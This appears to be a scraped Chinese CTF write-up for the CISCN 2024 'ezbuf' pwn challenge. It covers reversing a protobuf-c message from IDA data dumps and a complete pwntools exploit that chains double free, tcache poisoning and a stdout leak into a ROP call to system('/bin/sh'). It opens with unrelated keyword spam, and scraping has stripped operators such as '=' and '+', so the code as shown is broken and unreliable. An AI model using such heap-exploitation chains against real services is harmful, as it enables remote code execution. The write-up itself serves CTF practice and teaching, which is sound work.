ui做交互式网站吗,注册城乡规划师有什么用,寻亲网站开发设计文档,电商平台有哪些模式文章目录 参考protobuf逆向学习复原结构思路exp 参考 https://www.y4ng.cn/posts/pwn/protobuf/#ciscn-2024-ezbuf protobuf 当时压根不知道用了protobuf这个玩意#xff0c;提取工具也没提取出来#xff0c;还是做题做太少了#xff0c;很多关键性的结构都没看出来是pro… 文章目录 参考protobuf逆向学习复原结构思路exp 参考 https://www.y4ng.cn/posts/pwn/protobuf/#ciscn-2024-ezbuf protobuf 当时压根不知道用了protobuf这个玩意提取工具也没提取出来还是做题做太少了很多关键性的结构都没看出来是protobuf 下次可以根据ProtobufCMessageDescriptor结构体的magic头一般是0x28AAEEF9来搜索定位到ProtobufCMessageDescriptor 逆向学习 const ProtobufCMessageDescriptor devicemsg__descriptor {PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC,devicemsg,Devicemsg,Devicemsg,,sizeof(Devicemsg),5,devicemsg__field_descriptors,devicemsg__field_indices_by_name,1, devicemsg__number_ranges,(ProtobufCMessageInit) devicemsg__init,NULL,NULL,NULL /* reserved[123] */ };相关字段 /*** Describes a message.*/ struct ProtobufCMessageDescriptor {/** Magic value checked to ensure that the API is used correctly. */uint32_t magic;/** The qualified name (e.g., namespace.Type). */const char *name;/** The unqualified name as given in the .proto file (e.g., Type). */const char *short_name;/** Identifier used in generated C code. */const char *c_name;/** The dot-separated namespace. */const char *package_name;/*** Size in bytes of the C structure representing an instance of this* type of message.*/size_t sizeof_message;/** Number of elements in fields. */unsigned n_fields;/** Field descriptors, sorted by tag number. */const ProtobufCFieldDescriptor *fields;/** Used for looking up fields by name. */const unsigned *fields_sorted_by_name;/** Number of elements in field_ranges. */unsigned n_field_ranges;/** Used for looking up fields by id. */const ProtobufCIntRange *field_ranges;/** Message initialisation function. */ProtobufCMessageInit message_init;/** Reserved for future use. */void *reserved1;/** Reserved for future use. */void *reserved2;/** Reserved for future use. 
*/void *reserved3; }; 对应IDA中 .data.rel.ro:000000000000BC60 unk_BC60 db 0F9h ; DATA XREF: sub_1AFE5B↑o .data.rel.ro:000000000000BC60 ; sub_1B6617↑o ... .data.rel.ro:000000000000BC61 db 0EEh .data.rel.ro:000000000000BC62 db 0AAh .data.rel.ro:000000000000BC63 db 28h ; ( .data.rel.ro:000000000000BC64 db 0 .data.rel.ro:000000000000BC65 db 0 .data.rel.ro:000000000000BC66 db 0 .data.rel.ro:000000000000BC67 db 0 .data.rel.ro:000000000000BC68 dq offset aHeybro ; heybro .data.rel.ro:000000000000BC70 dq offset aHeybro_0 ; Heybro .data.rel.ro:000000000000BC78 dq offset aHeybro_0 ; Heybro .data.rel.ro:000000000000BC80 dq offset unk_910E .data.rel.ro:000000000000BC88 db 48h ; H .data.rel.ro:000000000000BC89 db 0 .data.rel.ro:000000000000BC8A db 0 .data.rel.ro:000000000000BC8B db 0 .data.rel.ro:000000000000BC8C db 0 .data.rel.ro:000000000000BC8D db 0 .data.rel.ro:000000000000BC8E db 0 .data.rel.ro:000000000000BC8F db 0 .data.rel.ro:000000000000BC90 db 5 .data.rel.ro:000000000000BC91 db 0 .data.rel.ro:000000000000BC92 db 0 .data.rel.ro:000000000000BC93 db 0 .data.rel.ro:000000000000BC94 db 0 .data.rel.ro:000000000000BC95 db 0 .data.rel.ro:000000000000BC96 db 0 .data.rel.ro:000000000000BC97 db 0 .data.rel.ro:000000000000BC98 dq offset off_BAE0 ; whatcon .data.rel.ro:000000000000BCA0 dq offset unk_90D0 .data.rel.ro:000000000000BCA8 db 1 .data.rel.ro:000000000000BCA9 db 0 .data.rel.ro:000000000000BCAA db 0 .data.rel.ro:000000000000BCAB db 0 .data.rel.ro:000000000000BCAC db 0 .data.rel.ro:000000000000BCAD db 0 .data.rel.ro:000000000000BCAE db 0 .data.rel.ro:000000000000BCAF db 0 .data.rel.ro:000000000000BCB0 dq offset unk_90F0 .data.rel.ro:000000000000BCB8 dq offset sub_1AFE然后根据ProtobufCFieldDescriptor去寻找内部各个字段的内容 static const ProtobufCFieldDescriptor devicemsg__field_descriptors[5] {{whatcon,1,PROTOBUF_C_LABEL_NONE,PROTOBUF_C_TYPE_BYTES,0, /* quantifier_offset */offsetof(Devicemsg, whatcon),NULL,NULL,0, /* flags */0,NULL,NULL /* reserved1,reserved2, etc 
*/},{whattodo,2,PROTOBUF_C_LABEL_NONE,PROTOBUF_C_TYPE_SINT64,0, /* quantifier_offset */offsetof(Devicemsg, whattodo),NULL,NULL,0, /* flags */0,NULL,NULL /* reserved1,reserved2, etc */},{whatidx,3,PROTOBUF_C_LABEL_NONE,PROTOBUF_C_TYPE_SINT64,0, /* quantifier_offset */offsetof(Devicemsg, whatidx),NULL,NULL,0, /* flags */0,NULL,NULL /* reserved1,reserved2, etc */},{whatsize,4,PROTOBUF_C_LABEL_NONE,PROTOBUF_C_TYPE_SINT64,0, /* quantifier_offset */offsetof(Devicemsg, whatsize),NULL,NULL,0, /* flags */0,NULL,NULL /* reserved1,reserved2, etc */},{protobuf_c_message_packwhatsthis,5,PROTOBUF_C_LABEL_NONE,PROTOBUF_C_TYPE_UINT32,0, /* quantifier_offset */offsetof(Devicemsg, whatsthis),NULL,NULL,0, /* flags */0,NULL,NULL /* reserved1,reserved2, etc */}, };相关字段的定义 struct ProtobufCFieldDescriptor {/** Name of the field as given in the .proto file. */const char *name;/** Tag value of the field as given in the .proto file. */uint32_t id;/** Whether the field is REQUIRED, OPTIONAL, or REPEATED. */ProtobufCLabel label;/** The type of the field. */ProtobufCType type;/*** The offset in bytes of the messages C structures quantifier field* (the has_MEMBER field for optional members or the n_MEMBER field* for repeated members or the case enum for oneofs).*/unsigned quantifier_offset;/*** The offset in bytes into the messages C structure for the member* itself.*/unsigned offset;/*** A type-specific descriptor.** If type is PROTOBUF_C_TYPE_ENUM, then descriptor points to the* corresponding ProtobufCEnumDescriptor.** If type is PROTOBUF_C_TYPE_MESSAGE, then descriptor points to* the corresponding ProtobufCMessageDescriptor.** Otherwise this field is NULL.*/const void *descriptor; /* for MESSAGE and ENUM types *//** The default value for this field, if defined. May be NULL. */const void *default_value;/*** A flag word. Zero or more of the bits defined in the* ProtobufCFieldFlag enum may be set.*/uint32_t flags;/** Reserved for future use. 
*/unsigned reserved_flags;/** Reserved for future use. */void *reserved2;/** Reserved for future use. */void *reserved3; }; 根据这四个字段来复原原来的结构const char *name; uint32_t id; ProtobufCLabel label; ProtobufCType type; typedef enum {/** A well-formed message must have exactly one of this field. */0 PROTOBUF_C_LABEL_REQUIRED,/*** A well-formed message can have zero or one of this field (but not* more than one).*/1 PROTOBUF_C_LABEL_OPTIONAL,/*** This field can be repeated any number of times (including zero) in a* well-formed message. The order of the repeated values will be* preserved.*/2 PROTOBUF_C_LABEL_REPEATED,/*** This field has no label. This is valid only in proto3 and is* equivalent to OPTIONAL but no has quantifier will be consulted.*/3 PROTOBUF_C_LABEL_NONE, } ProtobufCLabel;typedef enum { 0 PROTOBUF_C_TYPE_INT32, /** int32 */ 1 PROTOBUF_C_TYPE_SINT32, /** signed int32 */ 2 PROTOBUF_C_TYPE_SFIXED32, /** signed int32 (4 bytes) */ 3 PROTOBUF_C_TYPE_INT64, /** int64 */ 4 PROTOBUF_C_TYPE_SINT64, /** signed int64 */ 5 PROTOBUF_C_TYPE_SFIXED64, /** signed int64 (8 bytes) */ 6 PROTOBUF_C_TYPE_UINT32, /** unsigned int32 */ 7 PROTOBUF_C_TYPE_FIXED32, /** unsigned int32 (4 bytes) */ 8 PROTOBUF_C_TYPE_UINT64, /** unsigned int64 */ 9 PROTOBUF_C_TYPE_FIXED64, /** unsigned int64 (8 bytes) */ 10 PROTOBUF_C_TYPE_FLOAT, /** float */ 11 PROTOBUF_C_TYPE_DOUBLE, /** double */ 12 PROTOBUF_C_TYPE_BOOL, /** boolean */ 13 PROTOBUF_C_TYPE_ENUM, /** enumerated type */ 14 PROTOBUF_C_TYPE_STRING, /** UTF-8 or ASCII string */ 15 PROTOBUF_C_TYPE_BYTES, /** arbitrary byte sequence */ 16 PROTOBUF_C_TYPE_MESSAGE, /** nested message */ } ProtobufCType; 对应到IDA中 .data.rel.ro:000000000000BAE0 off_BAE0 dq offset aWhatcon ; DATA XREF: .data.rel.ro:000000000000BC98↓o .data.rel.ro:000000000000BAE0 ; whatcon .data.rel.ro:000000000000BAE8 db 1 .data.rel.ro:000000000000BAE9 db 0 .data.rel.ro:000000000000BAEA db 0 .data.rel.ro:000000000000BAEB db 0 .data.rel.ro:000000000000BAEC db 3 
.data.rel.ro:000000000000BAED db 0 .data.rel.ro:000000000000BAEE db 0 .data.rel.ro:000000000000BAEF db 0 .data.rel.ro:000000000000BAF0 db 0Fh .data.rel.ro:000000000000BAF1 db 0 .data.rel.ro:000000000000BAF2 db 0 .data.rel.ro:000000000000BAF3 db 0 .data.rel.ro:000000000000BAF4 db 0 .data.rel.ro:000000000000BAF5 db 0 .data.rel.ro:000000000000BAF6 db 0 .data.rel.ro:000000000000BAF7 db 0 .data.rel.ro:000000000000BAF8 db 18h .data.rel.ro:000000000000BAF9 db 0 .data.rel.ro:000000000000BAFA db 0 .data.rel.ro:000000000000BAFB db 0 .data.rel.ro:000000000000BAFC db 0 .data.rel.ro:000000000000BAFD db 0 .data.rel.ro:000000000000BAFE db 0 .data.rel.ro:000000000000BAFF db 0 .data.rel.ro:000000000000BB00 db 0 .data.rel.ro:000000000000BB01 db 0 .data.rel.ro:000000000000BB02 db 0 .data.rel.ro:000000000000BB03 db 0 .data.rel.ro:000000000000BB04 db 0 .data.rel.ro:000000000000BB05 db 0 .data.rel.ro:000000000000BB06 db 0 .data.rel.ro:000000000000BB07 db 0 .data.rel.ro:000000000000BB08 db 0 .data.rel.ro:000000000000BB09 db 0 .data.rel.ro:000000000000BB0A db 0 .data.rel.ro:000000000000BB0B db 0 .data.rel.ro:000000000000BB0C db 0 .data.rel.ro:000000000000BB0D db 0 .data.rel.ro:000000000000BB0E db 0 .data.rel.ro:000000000000BB0F db 0 .data.rel.ro:000000000000BB10 db 0 .data.rel.ro:000000000000BB11 db 0 .data.rel.ro:000000000000BB12 db 0 .data.rel.ro:000000000000BB13 db 0 .data.rel.ro:000000000000BB14 db 0 .data.rel.ro:000000000000BB15 db 0 .data.rel.ro:000000000000BB16 db 0 .data.rel.ro:000000000000BB17 db 0 .data.rel.ro:000000000000BB18 db 0 .data.rel.ro:000000000000BB19 db 0 .data.rel.ro:000000000000BB1A db 0 .data.rel.ro:000000000000BB1B db 0 .data.rel.ro:000000000000BB1C db 0 .data.rel.ro:000000000000BB1D db 0 .data.rel.ro:000000000000BB1E db 0 .data.rel.ro:000000000000BB1F db 0 .data.rel.ro:000000000000BB20 db 0 .data.rel.ro:000000000000BB21 db 0 .data.rel.ro:000000000000BB22 db 0 .data.rel.ro:000000000000BB23 db 0 .data.rel.ro:000000000000BB24 db 0 .data.rel.ro:000000000000BB25 db 0 
.data.rel.ro:000000000000BB26 db 0 .data.rel.ro:000000000000BB27 db 0 .data.rel.ro:000000000000BB28 dq offset aWhattodo ; whattodo .data.rel.ro:000000000000BB30 db 2 .data.rel.ro:000000000000BB31 db 0 .data.rel.ro:000000000000BB32 db 0 .data.rel.ro:000000000000BB33 db 0 .data.rel.ro:000000000000BB34 db 3 .data.rel.ro:000000000000BB35 db 0 .data.rel.ro:000000000000BB36 db 0 .data.rel.ro:000000000000BB37 db 0 .data.rel.ro:000000000000BB38 db 4 .data.rel.ro:000000000000BB39 db 0 .data.rel.ro:000000000000BB3A db 0 .data.rel.ro:000000000000BB3B db 0 .data.rel.ro:000000000000BB3C db 0 .data.rel.ro:000000000000BB3D db 0 .data.rel.ro:000000000000BB3E db 0 .data.rel.ro:000000000000BB3F db 0 .data.rel.ro:000000000000BB40 db 28h ; ( .data.rel.ro:000000000000BB41 db 0 .data.rel.ro:000000000000BB42 db 0 .data.rel.ro:000000000000BB43 db 0 .data.rel.ro:000000000000BB44 db 0 .data.rel.ro:000000000000BB45 db 0 .data.rel.ro:000000000000BB46 db 0 .data.rel.ro:000000000000BB47 db 0 .data.rel.ro:000000000000BB48 db 0 .data.rel.ro:000000000000BB49 db 0 .data.rel.ro:000000000000BB4A db 0 .data.rel.ro:000000000000BB4B db 0 .data.rel.ro:000000000000BB4C db 0 .data.rel.ro:000000000000BB4D db 0 .data.rel.ro:000000000000BB4E db 0 .data.rel.ro:000000000000BB4F db 0 .data.rel.ro:000000000000BB50 db 0 .data.rel.ro:000000000000BB51 db 0 .data.rel.ro:000000000000BB52 db 0 .data.rel.ro:000000000000BB53 db 0 .data.rel.ro:000000000000BB54 db 0 .data.rel.ro:000000000000BB55 db 0 .data.rel.ro:000000000000BB56 db 0 .data.rel.ro:000000000000BB57 db 0 .data.rel.ro:000000000000BB58 db 0 .data.rel.ro:000000000000BB59 db 0 .data.rel.ro:000000000000BB5A db 0 .data.rel.ro:000000000000BB5B db 0 .data.rel.ro:000000000000BB5C db 0 .data.rel.ro:000000000000BB5D db 0 .data.rel.ro:000000000000BB5E db 0 .data.rel.ro:000000000000BB5F db 0 .data.rel.ro:000000000000BB60 db 0 .data.rel.ro:000000000000BB61 db 0 .data.rel.ro:000000000000BB62 db 0 .data.rel.ro:000000000000BB63 db 0 .data.rel.ro:000000000000BB64 db 0 
.data.rel.ro:000000000000BB65 db 0 .data.rel.ro:000000000000BB66 db 0 .data.rel.ro:000000000000BB67 db 0 .data.rel.ro:000000000000BB68 db 0 .data.rel.ro:000000000000BB69 db 0 .data.rel.ro:000000000000BB6A db 0 .data.rel.ro:000000000000BB6B db 0 .data.rel.ro:000000000000BB6C db 0 .data.rel.ro:000000000000BB6D db 0 .data.rel.ro:000000000000BB6E db 0 .data.rel.ro:000000000000BB6F db 0 .data.rel.ro:000000000000BB70 dq offset aWhatidx ; whatidx .data.rel.ro:000000000000BB78 db 3 .data.rel.ro:000000000000BB79 db 0 .data.rel.ro:000000000000BB7A db 0 .data.rel.ro:000000000000BB7B db 0 .data.rel.ro:000000000000BB7C db 3 .data.rel.ro:000000000000BB7D db 0 .data.rel.ro:000000000000BB7E db 0 .data.rel.ro:000000000000BB7F db 0 .data.rel.ro:000000000000BB80 db 4 .data.rel.ro:000000000000BB81 db 0 .data.rel.ro:000000000000BB82 db 0 .data.rel.ro:000000000000BB83 db 0 .data.rel.ro:000000000000BB84 db 0 .data.rel.ro:000000000000BB85 db 0 .data.rel.ro:000000000000BB86 db 0 .data.rel.ro:000000000000BB87 db 0 .data.rel.ro:000000000000BB88 db 30h ; 0 .data.rel.ro:000000000000BB89 db 0 .data.rel.ro:000000000000BB8A db 0 .data.rel.ro:000000000000BB8B db 0 .data.rel.ro:000000000000BB8C db 0 .data.rel.ro:000000000000BB8D db 0 .data.rel.ro:000000000000BB8E db 0 .data.rel.ro:000000000000BB8F db 0 .data.rel.ro:000000000000BB90 db 0 .data.rel.ro:000000000000BB91 db 0 .data.rel.ro:000000000000BB92 db 0 .data.rel.ro:000000000000BB93 db 0 .data.rel.ro:000000000000BB94 db 0 .data.rel.ro:000000000000BB95 db 0 .data.rel.ro:000000000000BB96 db 0 .data.rel.ro:000000000000BB97 db 0 .data.rel.ro:000000000000BB98 db 0 .data.rel.ro:000000000000BB99 db 0 .data.rel.ro:000000000000BB9A db 0 .data.rel.ro:000000000000BB9B db 0 .data.rel.ro:000000000000BB9C db 0 .data.rel.ro:000000000000BB9D db 0 .data.rel.ro:000000000000BB9E db 0 .data.rel.ro:000000000000BB9F db 0 .data.rel.ro:000000000000BBA0 db 0 .data.rel.ro:000000000000BBA1 db 0 .data.rel.ro:000000000000BBA2 db 0 .data.rel.ro:000000000000BBA3 db 0 
.data.rel.ro:000000000000BBA4 db 0 .data.rel.ro:000000000000BBA5 db 0 .data.rel.ro:000000000000BBA6 db 0 .data.rel.ro:000000000000BBA7 db 0 .data.rel.ro:000000000000BBA8 db 0 .data.rel.ro:000000000000BBA9 db 0 .data.rel.ro:000000000000BBAA db 0 .data.rel.ro:000000000000BBAB db 0 .data.rel.ro:000000000000BBAC db 0 .data.rel.ro:000000000000BBAD db 0 .data.rel.ro:000000000000BBAE db 0 .data.rel.ro:000000000000BBAF db 0 .data.rel.ro:000000000000BBB0 db 0 .data.rel.ro:000000000000BBB1 db 0 .data.rel.ro:000000000000BBB2 db 0 .data.rel.ro:000000000000BBB3 db 0 .data.rel.ro:000000000000BBB4 db 0 .data.rel.ro:000000000000BBB5 db 0 .data.rel.ro:000000000000BBB6 db 0 .data.rel.ro:000000000000BBB7 db 0 .data.rel.ro:000000000000BBB8 dq offset aWhatsize ; whatsize .data.rel.ro:000000000000BBC0 db 4 .data.rel.ro:000000000000BBC1 db 0 .data.rel.ro:000000000000BBC2 db 0 .data.rel.ro:000000000000BBC3 db 0 .data.rel.ro:000000000000BBC4 db 3 .data.rel.ro:000000000000BBC5 db 0 .data.rel.ro:000000000000BBC6 db 0 .data.rel.ro:000000000000BBC7 db 0 .data.rel.ro:000000000000BBC8 db 4 .data.rel.ro:000000000000BBC9 db 0 .data.rel.ro:000000000000BBCA db 0 .data.rel.ro:000000000000BBCB db 0 .data.rel.ro:000000000000BBCC db 0 .data.rel.ro:000000000000BBCD db 0 .data.rel.ro:000000000000BBCE db 0 .data.rel.ro:000000000000BBCF db 0 .data.rel.ro:000000000000BBD0 db 38h ; 8 .data.rel.ro:000000000000BBD1 db 0 .data.rel.ro:000000000000BBD2 db 0 .data.rel.ro:000000000000BBD3 db 0 .data.rel.ro:000000000000BBD4 db 0 .data.rel.ro:000000000000BBD5 db 0 .data.rel.ro:000000000000BBD6 db 0 .data.rel.ro:000000000000BBD7 db 0 .data.rel.ro:000000000000BBD8 db 0 .data.rel.ro:000000000000BBD9 db 0 .data.rel.ro:000000000000BBDA db 0 .data.rel.ro:000000000000BBDB db 0 .data.rel.ro:000000000000BBDC db 0 .data.rel.ro:000000000000BBDD db 0 .data.rel.ro:000000000000BBDE db 0 .data.rel.ro:000000000000BBDF db 0 .data.rel.ro:000000000000BBE0 db 0 .data.rel.ro:000000000000BBE1 db 0 .data.rel.ro:000000000000BBE2 db 0 
.data.rel.ro:000000000000BBE3 db 0 .data.rel.ro:000000000000BBE4 db 0 .data.rel.ro:000000000000BBE5 db 0 .data.rel.ro:000000000000BBE6 db 0 .data.rel.ro:000000000000BBE7 db 0 .data.rel.ro:000000000000BBE8 db 0 .data.rel.ro:000000000000BBE9 db 0 .data.rel.ro:000000000000BBEA db 0 .data.rel.ro:000000000000BBEB db 0 .data.rel.ro:000000000000BBEC db 0 .data.rel.ro:000000000000BBED db 0 .data.rel.ro:000000000000BBEE db 0 .data.rel.ro:000000000000BBEF db 0 .data.rel.ro:000000000000BBF0 db 0 .data.rel.ro:000000000000BBF1 db 0 .data.rel.ro:000000000000BBF2 db 0 .data.rel.ro:000000000000BBF3 db 0 .data.rel.ro:000000000000BBF4 db 0 .data.rel.ro:000000000000BBF5 db 0 .data.rel.ro:000000000000BBF6 db 0 .data.rel.ro:000000000000BBF7 db 0 .data.rel.ro:000000000000BBF8 db 0 .data.rel.ro:000000000000BBF9 db 0 .data.rel.ro:000000000000BBFA db 0 .data.rel.ro:000000000000BBFB db 0 .data.rel.ro:000000000000BBFC db 0 .data.rel.ro:000000000000BBFD db 0 .data.rel.ro:000000000000BBFE db 0 .data.rel.ro:000000000000BBFF db 0 .data.rel.ro:000000000000BC00 dq offset aWhatsthis ; whatsthis .data.rel.ro:000000000000BC08 db 5 .data.rel.ro:000000000000BC09 db 0 .data.rel.ro:000000000000BC0A db 0 .data.rel.ro:000000000000BC0B db 0 .data.rel.ro:000000000000BC0C db 3 .data.rel.ro:000000000000BC0D db 0 .data.rel.ro:000000000000BC0E db 0 .data.rel.ro:000000000000BC0F db 0 .data.rel.ro:000000000000BC10 db 6 .data.rel.ro:000000000000BC11 db 0 .data.rel.ro:000000000000BC12 db 0 .data.rel.ro:000000000000BC13 db 0 .data.rel.ro:000000000000BC14 db 0 .data.rel.ro:000000000000BC15 db 0 .data.rel.ro:000000000000BC16 db 0 .data.rel.ro:000000000000BC17 db 0 .data.rel.ro:000000000000BC18 db 40h ; .data.rel.ro:000000000000BC19 db 0 .data.rel.ro:000000000000BC1A db 0 .data.rel.ro:000000000000BC1B db 0 .data.rel.ro:000000000000BC1C db 0 .data.rel.ro:000000000000BC1D db 0 .data.rel.ro:000000000000BC1E db 0 .data.rel.ro:000000000000BC1F db 0 .data.rel.ro:000000000000BC20 db 0 .data.rel.ro:000000000000BC21 db 0 
.data.rel.ro:000000000000BC22 db 0 .data.rel.ro:000000000000BC23 db 0 .data.rel.ro:000000000000BC24 db 0 .data.rel.ro:000000000000BC25 db 0 .data.rel.ro:000000000000BC26 db 0 .data.rel.ro:000000000000BC27 db 0 .data.rel.ro:000000000000BC28 db 0 .data.rel.ro:000000000000BC29 db 0 .data.rel.ro:000000000000BC2A db 0 .data.rel.ro:000000000000BC2B db 0 .data.rel.ro:000000000000BC2C db 0 .data.rel.ro:000000000000BC2D db 0 .data.rel.ro:000000000000BC2E db 0 .data.rel.ro:000000000000BC2F db 0 .data.rel.ro:000000000000BC30 db 0 .data.rel.ro:000000000000BC31 db 0 .data.rel.ro:000000000000BC32 db 0 .data.rel.ro:000000000000BC33 db 0 .data.rel.ro:000000000000BC34 db 0 .data.rel.ro:000000000000BC35 db 0 .data.rel.ro:000000000000BC36 db 0 .data.rel.ro:000000000000BC37 db 0 .data.rel.ro:000000000000BC38 db 0 .data.rel.ro:000000000000BC39 db 0 .data.rel.ro:000000000000BC3A db 0 .data.rel.ro:000000000000BC3B db 0 .data.rel.ro:000000000000BC3C db 0 .data.rel.ro:000000000000BC3D db 0 .data.rel.ro:000000000000BC3E db 0 .data.rel.ro:000000000000BC3F db 0 .data.rel.ro:000000000000BC40 db 0 .data.rel.ro:000000000000BC41 db 0 .data.rel.ro:000000000000BC42 db 0 .data.rel.ro:000000000000BC43 db 0 .data.rel.ro:000000000000BC44 db 0 .data.rel.ro:000000000000BC45 db 0 .data.rel.ro:000000000000BC46 db 0 .data.rel.ro:000000000000BC47 db 0 .data.rel.ro:000000000000BC48 db 0 .data.rel.ro:000000000000BC49 db 0 .data.rel.ro:000000000000BC4A db 0 .data.rel.ro:000000000000BC4B db 0 .data.rel.ro:000000000000BC4C db 0 .data.rel.ro:000000000000BC4D db 0 .data.rel.ro:000000000000BC4E db 0 .data.rel.ro:000000000000BC4F db 0 .data.rel.ro:000000000000BC50 db 0 .data.rel.ro:000000000000BC51 db 0 .data.rel.ro:000000000000BC52 db 0 .data.rel.ro:000000000000BC53 db 0 .data.rel.ro:000000000000BC54 db 0 .data.rel.ro:000000000000BC55 db 0 .data.rel.ro:000000000000BC56 db 0 .data.rel.ro:000000000000BC57 db 0 .data.rel.ro:000000000000BC58 db 0 .data.rel.ro:000000000000BC59 db 0 .data.rel.ro:000000000000BC5A db 0 
.data.rel.ro:000000000000BC5B db 0 .data.rel.ro:000000000000BC5C db 0 .data.rel.ro:000000000000BC5D db 0 .data.rel.ro:000000000000BC5E db 0 .data.rel.ro:000000000000BC5F db 0复原结构 根据ProtobufCMessageDescriptor 的name字段得到这个message的名字为heybro然后根据ProtobufCFieldDescriptor 的const char *name; uint32_t id; ProtobufCLabel label; ProtobufCType type;得到各个内容的名字idlabel和类型 message heybro{bytes whatcon 1;sint64 whattodo 2;sint64 whatidx 3;sint64 whatsize 4;uint32 whatsthis 5; }struct Heybro {ProtobufCMessage base; //24个字节ProtobufCBinaryData whatcon;int64_t whattodo;int64_t whatidx;int64_t whatsize;uint32_t whatsthis; };struct ProtobufCMessage {/** The descriptor for this message type. */const ProtobufCMessageDescriptor *descriptor;/** The number of elements in unknown_fields. */unsigned n_unknown_fields;/** The fields that werent recognized by the parser. */ProtobufCMessageUnknownField *unknown_fields; };struct ProtobufCBinaryData {size_t len; /** Number of bytes in the data field. */uint8_t *data; /** Data bytes. 
*/ };sub_1934(*(_QWORD *)(heybro 24),*(_QWORD *)(heybro 32),*(_QWORD *)(heybro 40),*(_QWORD *)(heybro 48),*(_QWORD *)(heybro 56),*(unsigned int *)(heybro 64));bytes类型转化为c语言结构时会变成一个结构体里面存放长度和内容指针。IDA由于没有内置相关结构信息将其当做八字节数组进行解析因此会产生一个有6个记录的错觉实际上后两个参数是同一个记录内置的两条记录。思路 add会检查索引然后根据索引分配会固定得到0x40大小的chunk并且会把whatcon的内容赋值过去10次delete会检查索引范围和对应索引的chunk是否为空但free后没有清零3次show。会在会检查索引范围和对应索引的chunk是否为空并且在whatsthis \xFF’和 whatsize 48都不满足会打印出chunk的内容 存在doublefreeshow after free add时候会先分配一个0x50和一个和data长度相同的chunk这两个都是从unsortedbin中分的然后先是将内容写到那个和data长度相同的chunk 最后memcpy将datachunk写到分配得到的0x40的chunk这里的话可以通过残留的libc泄露地址 泄露堆地址直接 由于mempy特性和必须写入内容特性残留堆地址会被修改所以没用通过free到tcache泄露即可 构造任意写但由于delete的限制次数刚好是10次所以只有一次任意写但此时tcache中存在其他bin有很多个可以通过写tcachebin然后实现多次任意写,泄露stack地址可以通过任意写stdout后泄露栈地址 IO_2_1_stdout_flags 0xFBAD1800然后让后面的三个read参数为0,然后就write_base和write_ptr之间为我们要输出的地址范围 malloc分配到tcachebin然后再修改tcachebin使得可以分配到栈上 exp from pwn import * import devicemsg_pb2 #context.log_leveldebug context.archamd64 context.oslinuxdef add(idx,con):brodevicemsg_pb2.heybro()bro.whatconconbro.whattodo1bro.whatidxidxp.sendafter(bWHAT DO YOU WANT?\n,bro.SerializeToString())def delete(idx):brodevicemsg_pb2.heybro()bro.whattodo2bro.whatidxidxp.sendafter(bWHAT DO YOU WANT?\n,bro.SerializeToString())def magic(idx,thiss,size,con):brodevicemsg_pb2.heybro()bro.whattodo3bro.whatidxidxbro.whatsthisthissbro.whatsizesizebro.whatconconp.sendafter(bWHAT DO YOU WANT?\n,bro.SerializeToString())def exitt():brodevicemsg_pb2.heybro()bro.whattodo4p.sendafter(bWHAT DO YOU WANT?\n,bro.SerializeToString())#premote(8.147.129.121,15268) pprocess(./pwn) libcELF(./libc.so.6)add(0,ba)add(1,ba)magic(0,0,0,b) p.recvuntil(bContent:) libcbaseu64(p.recvuntil(b\x7f).ljust(8,b\x00))-0x21ac61 print(hex(libcbase))for i in range(9):add(i,ba)for i in range(8):delete(i)magic(0,0,0,b) p.recvuntil(bContent:) heapu64(p.recvline()[:-1].ljust(8,b\x00))1 print(hex(heap))delete(8)delete(7)for i in range(7):add(i,ba)pause()add(7,p64(((heap12)-0x50000xe0)^heap)) add(7,ba) 
add(7,ba) add(7,b\x00*8p64(libcbase0x21b780-0x90)p64(0)p64(((heap12)-0x50000xe0))) payloadb\x00*0x90p64(0xfbad1887)p64(0)*3p64(libcbase0x222200)p64(libcbase0x222208) #写stderr add(7,payload) stacku64(p.recvuntil(b\x7f).ljust(8,b\x00)) add(7,p64(0)p64(stack-0x168)b\x00*0xd0)# 再次修改tcachebin #gdb.attach(p)rdilibcbase0x2a3e5 bin_shlibcbasenext(libc.search(b/bin/sh\x00)) systemlibcbaselibc.symbols[system] retlibcbase0x29139 ropba*8p64(ret)p64(rdi)p64(bin_sh)p64(system) add(7,rop.ljust(0xc0,b\x00)) p.interactive()